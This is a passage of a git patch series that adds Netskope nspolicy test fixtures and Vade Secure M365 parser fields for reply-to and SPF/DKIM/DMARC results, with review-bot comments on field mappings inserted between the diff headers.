13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":444444444444444444,\"severity\":\"unknown\",\"site\":\"DOH\",\"src_country\":\"FR\",\"src_latitude\":48.8323,\"src_location\":\"Paris\",\"src_longitude\":2.4075,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:01:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75018\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731574892,\"traffic_type\":\"CloudApp\",\"transaction_id\":111111111111,\"type\":\"nspolicy\",\"ur_normalized\":\"john.doe@mail.fr\",\"url\":\"test.example.com\",\"user\":\"john.doe@mail.fr\",\"useragent\":\"Chrome\",\"userip\":\"10.20.30.40\",\"userkey\":\"john.doe@mail.fr\",\"log_file_name\":\"\",\"from_user\":\"\",\"ext_labels\":[],\"audit_type\":\"\",\"CononicalName\":\"\",\"parent_id\":\"\",\"tss_scan_failed\":\"\",\"data_center\":\"\",\"from_user_category\":\"\",\"internal_collaborator_count\":0,\"dlp_rule_severity\":\"\",\"req_cnt\":0,\"dlp_parent_id\":0,\"alert_type\":\"\",\"workspace\":\"\",\"dst_geoip_src\":0,\"user_category\":\"\",\"channel_id\":\"\",\"loginurl\":\"\",\"dlp_is_unique_count\":\"\",\"netskope_activity\":\"\",\"retro_scan_name\":\"\",\"to_user\":\"\",\"sha256\":\"\",\"justification_type\":\"\",\"fromlogs\":\"\",\"title\":\"\",\"universal_connector\":\"\",\"custom_connector\":\"\",\"modified\":0,\"user_confidence_index\":0,\"exposure\":\"\",\"orignal_file_path\":\"\",\"instance_id\":\"\",\"managementID\":\"\",\"sanctioned_instance\":\"\",\"file_lang\":\"\",\"dlp_scan_failed\":\"\",\"mime_type\":\"\",\"browser_version\":\"\",\"object_id\":\"\",\"data_type\":\"\",\"audit_category\":\"\",\"dlp_mail_parent_id\":\"\",\"file_path\":\"\",\"sAMAccountName\":\"\",\"client_bytes\":0,\"dlp_file\":\"\",\"org\":\"\",\"numbytes\":0,\"tss_fail_reason\":\"\",\"object\":\"\",\"nsdeviceuid\":\"\",\"app_activity\":\"\",\"instance\":\"\",\"userPrincipalName\":\"\",\"object_type\":\"\",\"scan_type\":\"\",\"appsuite\":\"\",\"conn_duration\":0,\"file_t
ype\":\"\",\"dsthost\":\"\",\"logintype\":\"\",\"true_obj_type\":\"\",\"dlp_rule\":\"\",\"serial\":\"\",\"suppression_key\":\"\",\"suppression_start_time\":0,\"dlp_rule_count\":0,\"shared_with\":\"\",\"resp_cnt\":0,\"justification_reason\":\"\",\"web_universal_connector\":\"\",\"server_bytes\":0,\"dlp_unique_count\":0,\"md5\":\"\",\"file_size\":0,\"smtp_to\":[],\"dlp_incident_id\":0,\"true_obj_category\":\"\",\"src_geoip_src\":0,\"total_collaborator_count\":0,\"sessionid\":\"\",\"user_id\":\"\",\"custom_attr\":{},\"referer\":\"\",\"suppression_end_time\":0,\"owner\":\"\",\"tss_mode\":\"\",\"dlp_fail_reason\":\"\",\"workspace_id\":\"\",\"dlp_profile\":\"\"}", + "event": { + "action": "block", + "category": [ + "network" + ], + "dataset": "nspolicy", + "duration": 0, + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-14T09:01:32Z", + "destination": { + "address": "1.2.3.4", + "bytes": 0, + "geo": { + "city_name": "San Francisco", + "country_iso_code": "US", + "location": { + "lat": 37.775699615478516, + "lon": -122.39520263671875 + }, + "postal_code": "N/A", + "region_name": "California", + "timezone": "America/Los_Angeles" + }, + "ip": "1.2.3.4" + }, + "host": { + "name": "PC-HOST01", + "os": { + "name": "Windows 11", + "platform": "windows", + "type": "windows", + "version": "Windows NT 11.0" + } + }, + "netskope": { + "events": { + "access_method": "Client", + "application": { + "category": "General", + "name": "DNS Over HTTPS" + }, + "ccl": "unknown" + } + }, + "network": { + "bytes": 0 + }, + "observer": { + "vendor": "Netskope" + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "john.doe" + ] + }, + "rule": { + "id": "99999999999999999999999999999999 2024-10-30 13:52:18.401518", + "name": "Block DoH - incompatibility with Netskope" + }, + "source": { + "address": "5.6.7.8", + "bytes": 0, + "geo": { + "city_name": "Paris", + "country_iso_code": "FR", + "location": { + "lat": 48.8323, + "lon": 2.4075 + }, + 
"postal_code": "75018",
+ "region_name": "\u00cele-de-France",
+ "timezone": "Europe/Paris"
+ },
+ "ip": "5.6.7.8"
+ },
+ "url": {
+ "original": "test.example.com",
+ "path": "test.example.com"
+ },
+ "user": {
+ "domain": "mail.fr",
+ "email": "john.doe@mail.fr",
+ "name": "john.doe"
+ },
+ "user_agent": {
+ "name": "Chrome"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Netskope/netskope_events/tests/test_nspolicy_log.json b/Netskope/netskope_events/tests/test_nspolicy_log.json
index 25513a172..d0d9ed304 100644
--- a/Netskope/netskope_events/tests/test_nspolicy_log.json
+++ b/Netskope/netskope_events/tests/test_nspolicy_log.json
@@ -43,7 +43,8 @@
 "md5": "68b329da9893e34099c7d8ad5cb9c940"
 },
 "mime_type": "image/gif",
- "name": "giphy2.gif"
+ "name": "giphy2.gif",
+ "size": 204299
 },
 "host": {
 "name": "TEST-1111111",
diff --git a/Netskope/netskope_events/tests/test_nspolicy_upload.json b/Netskope/netskope_events/tests/test_nspolicy_upload.json
new file mode 100644
index 000000000..b05f61a9d
--- /dev/null
+++ b/Netskope/netskope_events/tests/test_nspolicy_upload.json
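Review bot: In the new `test_nspolicy_block.json` fixture, `url.path` is asserted as `test.example.com`, which is the host part of the vendor `url` (the value has no path component), so the expectation pins a hostname into ECS `url.path`; `url.domain` is the field that should carry it, with `url.path` left unset. The input also carries `ja3` (`1234567890abcdef1234567890abcdef`), yet the expected document has no `tls.client.ja3`, which is a loss for detection on a fixture that is specifically a DoH-blocking policy event. `event.action` is pinned to the vendor's lowercase `block`, while the malware fixture earlier in this commit pins `Detection` and the upload fixture pins `Upload`, so rules matching on `event.action` must be case-insensitive unless the parser normalizes the value. The file is also added without a trailing newline.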
@@ -0,0 +1,120 @@ +{ + "input": { + "message": "{\"_id\":\"2d7a3c19cf913179146454b6\",\"access_method\":\"Client\",\"activity\":\"Upload\",\"alert\":\"no\",\"app\":\"App\",\"app_session_id\":1234567890,\"appcategory\":\"Remote Access\",\"browser\":\"CHROME\",\"browser_session_id\":1111111111111111111,\"browser_version\":\"6.0;\",\"category\":\"Remote Access\",\"cci\":73,\"ccl\":\"medium\",\"connection_id\":0,\"count\":1,\"data_type\":\"application/octet-stream\",\"device\":\"Windows Device\",\"device_classification\":\"managed\",\"dst_country\":\"CZ\",\"dst_latitude\":50.0883,\"dst_location\":\"Prague\",\"dst_longitude\":14.4124,\"dst_region\":\"Prague\",\"dst_timezone\":\"Europe/Prague\",\"dst_zipcode\":\"110 00\",\"dstip\":\"1.2.3.4\",\"dstport\":80,\"file_size\":24,\"file_type\":\"File Type Not Detected\",\"hostname\":\"PC-HOST01\",\"ja3\":\"NotAvailable\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"md5\":\"68b329da9893e34099c7d8ad5cb9c940\",\"netskope_pop\":\"FR-PAR3\",\"object\":\"object.txt\",\"object_type\":\"File\",\"organization_unit\":\"\",\"os\":\"Windows 10\",\"os_version\":\"Windows NT 10.0\",\"other_categories\":[\"Remote Access\"],\"page\":\"test.example.com\",\"page_site\":\"app\",\"policy_id\":\"22222222222222222222222222222222 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":4444444444444444444,\"severity\":\"unknown\",\"site\":\"App\",\"src_country\":\"FR\",\"src_latitude\":48.6673,\"src_location\":\"Paris\",\"src_longitude\":2.3476,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:04:00 2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75001\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731575086,\"traffic_type\":\"CloudApp\",\"transaction_id\":5555555555555555555,\"type\":\"nspolicy\",\"universal_connector\":\"yes\",\"ur_normalized\":\"jdoe@mail.com\",\"url\":\"url.app.com/object2.txt\",\"user\":\"JDOE@mail.com\",\"useragent\":\"Mozilla/4.0 (compatible; CHROME 6.0; 
DynGate)\",\"userip\":\"10.20.30.40\",\"userkey\":\"JDOE@mail.com\",\"serial\":\"\",\"numbytes\":0,\"exposure\":\"\",\"server_bytes\":0,\"web_universal_connector\":\"\",\"logintype\":\"\",\"alert_type\":\"\",\"from_user\":\"\",\"dlp_scan_failed\":\"\",\"dlp_rule\":\"\",\"fromlogs\":\"\",\"justification_type\":\"\",\"tss_mode\":\"\",\"user_category\":\"\",\"src_geoip_src\":0,\"CononicalName\":\"\",\"shared_with\":\"\",\"channel_id\":\"\",\"dlp_mail_parent_id\":\"\",\"custom_attr\":{},\"sha256\":\"\",\"resp_cnt\":0,\"custom_connector\":\"\",\"orignal_file_path\":\"\",\"to_user\":\"\",\"internal_collaborator_count\":0,\"owner\":\"\",\"appsuite\":\"\",\"org\":\"\",\"dsthost\":\"\",\"tss_fail_reason\":\"\",\"audit_type\":\"\",\"parent_id\":\"\",\"data_center\":\"\",\"loginurl\":\"\",\"mime_type\":\"\",\"from_user_category\":\"\",\"file_path\":\"\",\"modified\":0,\"referer\":\"\",\"dlp_profile\":\"\",\"object_id\":\"\",\"true_obj_type\":\"\",\"tss_scan_failed\":\"\",\"managementID\":\"\",\"dst_geoip_src\":0,\"dlp_rule_severity\":\"\",\"conn_duration\":0,\"policy\":\"\",\"netskope_activity\":\"\",\"audit_category\":\"\",\"smtp_to\":[],\"nsdeviceuid\":\"\",\"justification_reason\":\"\",\"suppression_start_time\":0,\"dlp_is_unique_count\":\"\",\"dlp_parent_id\":0,\"dlp_fail_reason\":\"\",\"userPrincipalName\":\"\",\"dlp_file\":\"\",\"dlp_incident_id\":0,\"sanctioned_instance\":\"\",\"suppression_key\":\"\",\"retro_scan_name\":\"\",\"instance_id\":\"\",\"true_obj_category\":\"\",\"action\":\"\",\"sessionid\":\"\",\"file_lang\":\"\",\"log_file_name\":\"\",\"notify_template\":\"\",\"sAMAccountName\":\"\",\"ext_labels\":[],\"instance\":\"\",\"user_id\":\"\",\"workspace\":\"\",\"dlp_rule_count\":0,\"app_activity\":\"\",\"suppression_end_time\":0,\"title\":\"\",\"scan_type\":\"\",\"dlp_unique_count\":0,\"total_collaborator_count\":0,\"client_bytes\":0,\"req_cnt\":0,\"user_confidence_index\":0,\"workspace_id\":\"\"}", + "sekoiaio": { + "intake": { + "dialect": "Netskope", + 
"dialect_uuid": "de9ca004-991e-4f5c-89c5-e075f3fb3216" + } + } + }, + "expected": { + "message": "{\"_id\":\"2d7a3c19cf913179146454b6\",\"access_method\":\"Client\",\"activity\":\"Upload\",\"alert\":\"no\",\"app\":\"App\",\"app_session_id\":1234567890,\"appcategory\":\"Remote Access\",\"browser\":\"CHROME\",\"browser_session_id\":1111111111111111111,\"browser_version\":\"6.0;\",\"category\":\"Remote Access\",\"cci\":73,\"ccl\":\"medium\",\"connection_id\":0,\"count\":1,\"data_type\":\"application/octet-stream\",\"device\":\"Windows Device\",\"device_classification\":\"managed\",\"dst_country\":\"CZ\",\"dst_latitude\":50.0883,\"dst_location\":\"Prague\",\"dst_longitude\":14.4124,\"dst_region\":\"Prague\",\"dst_timezone\":\"Europe/Prague\",\"dst_zipcode\":\"110 00\",\"dstip\":\"1.2.3.4\",\"dstport\":80,\"file_size\":24,\"file_type\":\"File Type Not Detected\",\"hostname\":\"PC-HOST01\",\"ja3\":\"NotAvailable\",\"ja3s\":\"NotAvailable\",\"managed_app\":\"no\",\"md5\":\"68b329da9893e34099c7d8ad5cb9c940\",\"netskope_pop\":\"FR-PAR3\",\"object\":\"object.txt\",\"object_type\":\"File\",\"organization_unit\":\"\",\"os\":\"Windows 10\",\"os_version\":\"Windows NT 10.0\",\"other_categories\":[\"Remote Access\"],\"page\":\"test.example.com\",\"page_site\":\"app\",\"policy_id\":\"22222222222222222222222222222222 2024-10-30 13:52:18.401518\",\"protocol\":\"HTTPS/1.1\",\"request_id\":4444444444444444444,\"severity\":\"unknown\",\"site\":\"App\",\"src_country\":\"FR\",\"src_latitude\":48.6673,\"src_location\":\"Paris\",\"src_longitude\":2.3476,\"src_region\":\"\u00cele-de-France\",\"src_time\":\"Thu Nov 14 10:04:00 
2024\",\"src_timezone\":\"Europe/Paris\",\"src_zipcode\":\"75001\",\"srcip\":\"5.6.7.8\",\"telemetry_app\":\"\",\"timestamp\":1731575086,\"traffic_type\":\"CloudApp\",\"transaction_id\":5555555555555555555,\"type\":\"nspolicy\",\"universal_connector\":\"yes\",\"ur_normalized\":\"jdoe@mail.com\",\"url\":\"url.app.com/object2.txt\",\"user\":\"JDOE@mail.com\",\"useragent\":\"Mozilla/4.0 (compatible; CHROME 6.0; DynGate)\",\"userip\":\"10.20.30.40\",\"userkey\":\"JDOE@mail.com\",\"serial\":\"\",\"numbytes\":0,\"exposure\":\"\",\"server_bytes\":0,\"web_universal_connector\":\"\",\"logintype\":\"\",\"alert_type\":\"\",\"from_user\":\"\",\"dlp_scan_failed\":\"\",\"dlp_rule\":\"\",\"fromlogs\":\"\",\"justification_type\":\"\",\"tss_mode\":\"\",\"user_category\":\"\",\"src_geoip_src\":0,\"CononicalName\":\"\",\"shared_with\":\"\",\"channel_id\":\"\",\"dlp_mail_parent_id\":\"\",\"custom_attr\":{},\"sha256\":\"\",\"resp_cnt\":0,\"custom_connector\":\"\",\"orignal_file_path\":\"\",\"to_user\":\"\",\"internal_collaborator_count\":0,\"owner\":\"\",\"appsuite\":\"\",\"org\":\"\",\"dsthost\":\"\",\"tss_fail_reason\":\"\",\"audit_type\":\"\",\"parent_id\":\"\",\"data_center\":\"\",\"loginurl\":\"\",\"mime_type\":\"\",\"from_user_category\":\"\",\"file_path\":\"\",\"modified\":0,\"referer\":\"\",\"dlp_profile\":\"\",\"object_id\":\"\",\"true_obj_type\":\"\",\"tss_scan_failed\":\"\",\"managementID\":\"\",\"dst_geoip_src\":0,\"dlp_rule_severity\":\"\",\"conn_duration\":0,\"policy\":\"\",\"netskope_activity\":\"\",\"audit_category\":\"\",\"smtp_to\":[],\"nsdeviceuid\":\"\",\"justification_reason\":\"\",\"suppression_start_time\":0,\"dlp_is_unique_count\":\"\",\"dlp_parent_id\":0,\"dlp_fail_reason\":\"\",\"userPrincipalName\":\"\",\"dlp_file\":\"\",\"dlp_incident_id\":0,\"sanctioned_instance\":\"\",\"suppression_key\":\"\",\"retro_scan_name\":\"\",\"instance_id\":\"\",\"true_obj_category\":\"\",\"action\":\"\",\"sessionid\":\"\",\"file_lang\":\"\",\"log_file_name\":\"\",\"notify_template
\":\"\",\"sAMAccountName\":\"\",\"ext_labels\":[],\"instance\":\"\",\"user_id\":\"\",\"workspace\":\"\",\"dlp_rule_count\":0,\"app_activity\":\"\",\"suppression_end_time\":0,\"title\":\"\",\"scan_type\":\"\",\"dlp_unique_count\":0,\"total_collaborator_count\":0,\"client_bytes\":0,\"req_cnt\":0,\"user_confidence_index\":0,\"workspace_id\":\"\"}", + "event": { + "action": "Upload", + "category": [ + "network" + ], + "dataset": "nspolicy", + "duration": 0, + "kind": "event", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-14T09:04:46Z", + "destination": { + "address": "1.2.3.4", + "bytes": 0, + "geo": { + "city_name": "Prague", + "country_iso_code": "CZ", + "location": { + "lat": 50.0883, + "lon": 14.4124 + }, + "postal_code": "110 00", + "region_name": "Prague", + "timezone": "Europe/Prague" + }, + "ip": "1.2.3.4" + }, + "file": { + "hash": { + "md5": "68b329da9893e34099c7d8ad5cb9c940" + }, + "mime_type": "File Type Not Detected", + "name": "object.txt", + "size": 24 + }, + "host": { + "name": "PC-HOST01", + "os": { + "name": "Windows 10", + "platform": "windows", + "type": "windows", + "version": "Windows NT 10.0" + } + }, + "netskope": { + "events": { + "access_method": "Client", + "application": { + "category": "Remote Access", + "name": "App" + }, + "ccl": "medium" + } + }, + "network": { + "bytes": 0 + }, + "observer": { + "vendor": "Netskope" + }, + "related": { + "hash": [ + "68b329da9893e34099c7d8ad5cb9c940" + ], + "ip": [ + "1.2.3.4", + "5.6.7.8" + ], + "user": [ + "JDOE" + ] + }, + "rule": { + "id": "22222222222222222222222222222222 2024-10-30 13:52:18.401518" + }, + "source": { + "address": "5.6.7.8", + "bytes": 0, + "geo": { + "city_name": "Paris", + "country_iso_code": "FR", + "location": { + "lat": 48.6673, + "lon": 2.3476 + }, + "postal_code": "75001", + "region_name": "\u00cele-de-France", + "timezone": "Europe/Paris" + }, + "ip": "5.6.7.8" + }, + "url": { + "original": "url.app.com/object2.txt", + "path": "url.app.com/object2.txt" + }, + 
"user": {
+ "domain": "mail.com",
+ "email": "JDOE@mail.com",
+ "name": "JDOE"
+ },
+ "user_agent": {
+ "name": "CHROME",
+ "version": "6.0;"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Netskope/netskope_events/tests/test_user_alert.json b/Netskope/netskope_events/tests/test_user_alert.json
index a882c2ac5..4c435b860 100644
--- a/Netskope/netskope_events/tests/test_user_alert.json
+++ b/Netskope/netskope_events/tests/test_user_alert.json
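Review bot: In the new `test_nspolicy_upload.json` fixture, `file.mime_type` is asserted as `File Type Not Detected`, i.e. the vendor `file_type` label, although the input's `data_type` is `application/octet-stream`, which is the actual MIME type; the expectation pins the wrong source field, and the pre-existing DLP fixture (where `mime_type` holds a file name) shows the same mapping. `user.name` and `related.user` are asserted as `JDOE` from the mixed-case `user` field even though the input also provides `ur_normalized: jdoe@mail.com`; deriving identity from the normalized field (or lower-casing it) keeps `related.user` joinable across events from the same account. As in the block fixture, `url.path` holds the full `url.app.com/object2.txt` rather than `/object2.txt`, and the file lacks a trailing newline. `event.action` is `Upload` here while the input `action` is empty, which suggests a fall-back to `activity` in the parser — worth a comment in the parser so the rule is not inferable only from this fixture.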
@@ -5,7 +5,7 @@ "expected": { "message": "{\n \"_id\": \"882049056ee9e069c1c329b7\",\n \"access_method\": \"Client\",\n \"action\": \"useralert\",\n \"activity\": \"Share\",\n \"alert\": \"yes\",\n \"app\": \"WeTransfer\",\n \"app_session_id\": 1111111111111111111,\n \"appcategory\": \"Cloud Storage\",\n \"browser\": \"Edge\",\n \"browser_session_id\": 2222222222222222222,\n \"browser_version\": \"108.0.1462.54\",\n \"category\": \"Cloud Storage\",\n \"cci\": 58,\n \"ccl\": \"low\",\n \"connection_id\": 3333333333333333333,\n \"count\": 1,\n \"device\": \"Windows Device\",\n \"device_classification\": \"unmanaged\",\n \"dst_country\": \"IE\",\n \"dst_geoip_src\": 2,\n \"dst_latitude\": 53.3379,\n \"dst_location\": \"Dublin\",\n \"dst_longitude\": -6.2591,\n \"dst_region\": \"Leinster\",\n \"dst_timezone\": \"Europe/Dublin\",\n \"dst_zipcode\": \"D02\",\n \"dstip\": \"108.128.91.183\",\n \"from_user\": \"jane.doe@example.org\",\n \"hostname\": \"TEST-1234\",\n \"managed_app\": \"no\",\n \"managementID\": \"99999999999999999999999999999999\",\n \"netskope_pop\": \"FR-PAR1\",\n \"notify_template\": \"useralert_justify.html\",\n \"nsdeviceuid\": \"BC848089-186A-4F2D-A26F-E5CC94C29E56\",\n \"object\": \"Client.exe\",\n \"object_type\": \"File\",\n \"organization_unit\": \"\",\n \"os\": \"Windows 11\",\n \"os_version\": \"Windows 11\",\n \"page\": \"wetransfer.com/\",\n \"page_site\": \"Web Background\",\n \"policy\": \"DO NOT CHANGE Educate Upload to Non-Corporate Storage\",\n \"policy_id\": \"99999999999999999999999999999999 2022-12-21 14:31:09.981853\",\n \"protocol\": \"HTTPS/2\",\n \"referer\": \"https://wetransfer.com/\",\n \"request_id\": 4444444444444444444,\n \"severity\": \"unknown\",\n \"site\": \"WeTransfer\",\n \"src_country\": \"FR\",\n \"src_geoip_src\": 2,\n \"src_latitude\": 48.11,\n \"src_location\": \"Rennes\",\n \"src_longitude\": -1.6744,\n \"src_region\": \"Brittany\",\n \"src_time\": \"Wed Dec 21 15:52:08 2022\",\n \"src_timezone\": 
\"Europe/Paris\",\n \"src_zipcode\": \"35000\",\n \"srcip\": \"4.3.2.1\",\n \"telemetry_app\": \"\",\n \"timestamp\": 1671634321,\n \"to_user\": \"a@a.fr\",\n \"traffic_type\": \"CloudApp\",\n \"transaction_id\": 4444444444444444444,\n \"type\": \"nspolicy\",\n \"ur_normalized\": \"john.doe@example.org\",\n \"url\": \"wetransfer.com/api/v4/transfers/email\",\n \"user\": \"john.doe@example.org\",\n \"useragent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54\",\n \"userip\": \"1.2.3.4\",\n \"userkey\": \"john.doe@example.org\",\n \"internal_collaborator_count\": 0,\n \"fromlogs\": \"\",\n \"dlp_incident_id\": 0,\n \"owner\": \"\",\n \"dlp_profile\": \"\",\n \"workspace\": \"\",\n \"user_id\": \"\",\n \"userPrincipalName\": \"\",\n \"true_obj_category\": \"\",\n \"dlp_is_unique_count\": \"\",\n \"orignal_file_path\": \"\",\n \"other_categories\": [],\n \"serial\": \"\",\n \"tss_mode\": \"\",\n \"conn_duration\": 0,\n \"from_user_category\": \"\",\n \"md5\": \"\",\n \"data_type\": \"\",\n \"title\": \"\",\n \"log_file_name\": \"\",\n \"dstport\": 0,\n \"exposure\": \"\",\n \"instance_id\": \"\",\n \"audit_category\": \"\",\n \"netskope_activity\": \"\",\n \"file_type\": \"\",\n \"total_collaborator_count\": 0,\n \"file_path\": \"\",\n \"modified\": 0,\n \"dlp_rule_count\": 0,\n \"suppression_end_time\": 0,\n \"CononicalName\": \"\",\n \"alert_type\": \"\",\n \"sanctioned_instance\": \"\",\n \"suppression_start_time\": 0,\n \"dlp_parent_id\": 0,\n \"true_obj_type\": \"\",\n \"dlp_mail_parent_id\": \"\",\n \"audit_type\": \"\",\n \"workspace_id\": \"\",\n \"dsthost\": \"\",\n \"web_universal_connector\": \"\",\n \"req_cnt\": 0,\n \"mime_type\": \"\",\n \"suppression_key\": \"\",\n \"scan_type\": \"\",\n \"shared_with\": \"\",\n \"client_bytes\": 0,\n \"object_id\": \"\",\n \"user_category\": \"\",\n \"dlp_rule\": \"\",\n \"parent_id\": \"\",\n \"sha256\": \"\",\n \"dlp_rule_severity\": 
\"\",\n \"logintype\": \"\",\n \"org\": \"\",\n \"dlp_unique_count\": 0,\n \"file_size\": 0,\n \"instance\": \"\",\n \"sAMAccountName\": \"\",\n \"resp_cnt\": 0,\n \"universal_connector\": \"\",\n \"numbytes\": 0,\n \"server_bytes\": 0,\n \"channel_id\": \"\",\n \"file_lang\": \"\",\n \"app_activity\": \"\",\n \"appsuite\": \"\",\n \"sessionid\": \"\",\n \"loginurl\": \"\",\n \"dlp_file\": \"\",\n \"data_center\": \"\",\n \"custom_connector\": \"\"\n}\n", "event": { - "action": "Share", + "action": "useralert", "category": [ "network" ], From dc3c4ff33c7a2ecedd7e1f28c5662b24f763efa0 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 19 Nov 2024 11:32:02 +0100 Subject: [PATCH 061/150] Improvement: Vade Secure M365 - Add parsed fields --- VadeSecure/vade_secure_m365/_meta/fields.yml | 5 ++ VadeSecure/vade_secure_m365/ingest/parser.yml | 5 ++ .../vade_secure_m365/tests/email_02.json | 61 +++++++++++++++ .../tests/email_with_attachment_02.json | 77 +++++++++++++++++++ 4 files changed, 148 insertions(+) create mode 100644 VadeSecure/vade_secure_m365/tests/email_02.json create mode 100644 VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml index 1e4a81657..a3f60b15c 100644 --- a/VadeSecure/vade_secure_m365/_meta/fields.yml +++ b/VadeSecure/vade_secure_m365/_meta/fields.yml @@ -58,6 +58,11 @@ vadesecure.attachments: short: vadesecure.to_header type: array +vadesecure.auth_results_details: + description: Details of security protocols, mostly SPF, DKIM and DMARC. + name: vadesecure.auth_results_details + type: object + vadesecure.campaign.actions: description: The actions carried out for the remediation campaign. name: vadesecure.campaign.actions diff --git a/VadeSecure/vade_secure_m365/ingest/parser.yml b/VadeSecure/vade_secure_m365/ingest/parser.yml index 539de1df4..cbac9cd2d 100644 --- a/VadeSecure/vade_secure_m365/ingest/parser.yml 
+++ b/VadeSecure/vade_secure_m365/ingest/parser.yml
@@ -56,6 +56,7 @@ stages:
 actions:
 - name: set
 set:
+ vadesecure.auth_results_details: "{{parse_json.message.auth_results_details}}"
 vadesecure.folder: "{{parse_json.message.folder}}"
 vadesecure.from_header: "{{parse_json.message.from_header}}"
 vadesecure.to_header: "{{parse_json.message.to_header}}"
@@ -131,3 +132,7 @@ stages:
 - set:
 source.ip: "{{parse_json.message.sender_ip}}"
 filter: "{{parse_json.message.sender_ip| is_ipaddress}}"
+
+ - set:
+ email.reply_to.address: "{{parse_json.message.reply_to_header}}"
+ filter: "{{parse_json.message.reply_to_header != ''}}"
diff --git a/VadeSecure/vade_secure_m365/tests/email_02.json b/VadeSecure/vade_secure_m365/tests/email_02.json
new file mode 100644
index 000000000..7b2c0ae83
--- /dev/null
+++ b/VadeSecure/vade_secure_m365/tests/email_02.json
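Review bot: The new `email.reply_to.address` action copies `reply_to_header` verbatim into an ECS address field, but in this intake the `*_header` keys carry the header's display form — the fixture added in the same patch has `from_header: "John Doe"` beside `from: "jd@doe.fr"` — so a Reply-To written as `Name <addr>` would be stored as an address and would not match on `email.from.address`. Worth checking against a sample that has a display name before relying on this field, and parsing the address out if that form occurs. The `!= ''` filter also does not cover a payload where `reply_to_header` is absent rather than empty; if the engine follows Jinja semantics an undefined value compares unequal to `''` and the action still fires, so `filter: "{{parse_json.message.reply_to_header | default('') != ''}}"` is the safer guard. The rest of the enclosing stage is outside the hunk.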
@@ -0,0 +1,61 @@ +{ + "input": { + "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": \"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}", + "sekoiaio": { + "intake": { + "dialect": "Vade for M365", + "dialect_uuid": "e4a758fc-7620-49e6-b8ed-b7fb3d7fa232" + } + } + }, + "expected": { + "message": "{\"id\": \"cs72a9b6r0glddhdfh7g\", \"date\": \"2024-10-15T08:17:41.776Z\", \"sender_ip\": \"1.2.3.4\", \"from\": \"jd@doe.fr\", \"from_header\": \"John Doe\", \"to\": \"alan.smithee@doe.fr\", \"to_header\": \"Alan.smithee@doe.fr\", \"subject\": \"Informations\", \"message_id\": \"\", \"urls\": [], \"attachments\": [], \"status\": \"LEGIT\", \"substatus\": \"\", \"last_report\": \"none\", \"last_report_date\": \"0001-01-01T00:00:00Z\", \"remediation_type\": \"none\", \"remediation_ids\": [], \"action\": \"NOTHING\", \"folder\": \"\", \"size\": 26875, \"current_events\": [], \"whitelisted\": false, \"direction\": \"incoming\", \"remediation_message_read\": false, \"geo\": {\"country_name\": \"United States\", \"country_iso_code\": \"US\", \"city_name\": \"\"}, \"malware_bypass\": false, \"reply_to_header\": 
\"user@company.com\", \"overdict\": \"clean\", \"auth_results_details\": {\"dkim\": \"none\", \"spf\": \"temperror\", \"dmarc\": \"fail\"}}", + "event": { + "action": "nothing", + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "attachments": [], + "from": { + "address": "jd@doe.fr" + }, + "local_id": "cs72a9b6r0glddhdfh7g", + "message_id": "", + "reply_to": { + "address": "user@company.com" + }, + "subject": "Informations", + "to": { + "address": "alan.smithee@doe.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [], + "auth_results_details": { + "dkim": "none", + "dmarc": "fail", + "spf": "temperror" + }, + "from_header": "John Doe", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan.smithee@doe.fr", + "whitelist": "false" + } + } +} \ No newline at end of file diff --git a/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json b/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json new file mode 100644 index 000000000..679e24c56 --- /dev/null +++ b/VadeSecure/vade_secure_m365/tests/email_with_attachment_02.json 
